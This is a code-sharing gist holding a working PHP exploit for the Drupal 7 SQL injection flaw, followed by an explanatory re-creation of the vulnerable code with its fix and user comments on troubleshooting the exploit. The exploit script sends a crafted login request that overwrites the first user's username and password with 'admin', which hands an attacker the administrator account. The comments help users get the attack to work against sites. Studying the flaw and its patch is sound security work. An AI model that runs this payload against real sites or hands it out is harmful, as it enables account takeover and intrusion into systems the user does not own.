Gist: milankragujevic/61eb72df71b69df80e86
```php
<?php
/********************************************************
 * Drupal 7 SQL Injection vulnerability demo
 * Created by Milan Kragujevic (of milankragujevic.com)
 * Read more at http://milankragujevic.com/post/66
 * This will change the first user's username to admin
 * and their password to admin
 * Change $url to the website URL
 ********************************************************/
$url = '[URL HERE]'; // URL of the website (http://domain.com/)
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
    'http' => array(
        'method'  => 'POST',
        'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $post_data
    )
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
    echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
    echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
```
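For readers who want to understand what the `name[...]` payload above is abusing, here is an added illustration (not part of the gist and not Drupal's own code): a stripped-down re-creation of the Drupal 7 placeholder-expansion step, shown in its vulnerable form beside the one-line `array_values()` hardening that Drupal 7.32 shipped. The function name `expand_placeholders` and the sample query and arguments are constructed for this example.

```php
<?php
// Constructed re-creation of the placeholder-expansion logic, not Drupal's
// actual function. Array placeholders like ":name" are expanded into
// ":name_0, :name_1, ..." by appending each element's array KEY.
function expand_placeholders($query, array $args, $hardened) {
    foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = array();
        // Vulnerable: keys come straight from request data, so a key such as
        // "0 ; -- " is spliced verbatim into the SQL text.
        // Hardened: array_values() renumbers the keys 0..n-1 first, so only
        // integers can ever reach the query string.
        $items = $hardened ? array_values($data) : $data;
        foreach ($items as $i => $value) {
            $new_keys[$key . '_' . $i] = $value;
        }
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
        unset($args[$key]);
        $args += $new_keys;
    }
    return array($query, $args);
}

$sql = 'SELECT uid FROM {users} WHERE name IN (:name)';
// Constructed request shape: an array value whose first key is attacker text.
$args = array(':name' => array('0 ; -- ' => 'alice', '0' => 'bob'));

list($vulnerable, ) = expand_placeholders($sql, $args, false);
list($fixed, $fixedArgs) = expand_placeholders($sql, $args, true);

echo "vulnerable: $vulnerable\n"; // IN (:name_0 ; -- , :name_0) -- raw SQL leaked from the key
echo "hardened:   $fixed\n";      // IN (:name_0, :name_1)
echo "bound args: " . implode(', ', array_keys($fixedArgs)) . "\n"; // :name_0, :name_1
```

The defensive takeaway matches Drupal's own advisory for this bug: the placeholder expansion in releases before 7.32 trusts array keys taken from request data, and the fix is to upgrade to 7.32 or later.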
This approach seems quite interesting to me, but would you mind presenting a similar "less destructive" version of this exploit/test?
My $data variable comes back empty using this code, and I'm entering the URL correctly using my dev server and a 7.31 site that I maintain.
@McBochi I'm working on it. I'll update the blog post if I discover something.
@jordanIgraham Please "echo $url . '?q=node&destination=node';" and open the output URL in the browser. Maybe you're simply not entering the URL correctly, or PHP is being blocked by some other means. Turn on error_reporting and display_errors. I can't reproduce the issue.
@milankragujevic thanks, I omitted "http://" in my URL. Now I get a lot of data, but the data is the HTML of the site at $url. The string 'mb_strlen() expects parameter 1 to be string' is not in the $data. If it's helpful, echo $ctx outputs "Resource id #2".
Not really. You should try logging in to the website... If the website has PHP display_errors turned off, you won't see the error. There is no way to verify other than to try and log in.
Did you enter the URL correctly? ("http://domain.com/") Maybe the website is using CloudFlare or forbids empty User-Agent headers... Also try logging in, if the website has errors disabled it might indicate it's not vulnerable when in fact it is.